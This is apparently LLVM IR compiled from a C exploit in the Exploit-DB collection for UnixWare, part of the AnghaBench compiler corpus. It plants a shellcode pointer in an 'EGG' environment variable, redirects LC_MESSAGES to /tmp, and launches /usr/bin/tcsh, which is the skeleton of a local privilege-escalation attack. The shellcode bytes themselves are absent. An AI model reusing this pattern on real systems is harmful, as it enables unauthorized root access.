; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/unixware/local/extr_21284.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/unixware/local/extr_21284.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [7 x i8] c"EGG=%s\00", align 1
@shellcode = common dso_local global i8* null, align 8
@.str.1 = private unnamed_addr constant [17 x i8] c"LC_MESSAGES=/tmp\00", align 1
@.str.2 = private unnamed_addr constant [14 x i8] c"/usr/bin/tcsh\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca [1024 x i8], align 16
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %6 = getelementptr inbounds [1024 x i8], [1024 x i8]* %5, i64 0, i64 0
  %7 = load i8*, i8** @shellcode, align 8
  %8 = call i32 @sprintf(i8* %6, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str, i64 0, i64 0), i8* %7)
  %9 = getelementptr inbounds [1024 x i8], [1024 x i8]* %5, i64 0, i64 0
  %10 = call i32 @putenv(i8* %9)
  %11 = call i32 @putenv(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.1, i64 0, i64 0))
  %12 = call i32 @system(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.2, i64 0, i64 0))
  ret i32 0
}

declare dso_local i32 @sprintf(i8*, i8*, i8*) #1

declare dso_local i32 @putenv(i8*) #1

declare dso_local i32 @system(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
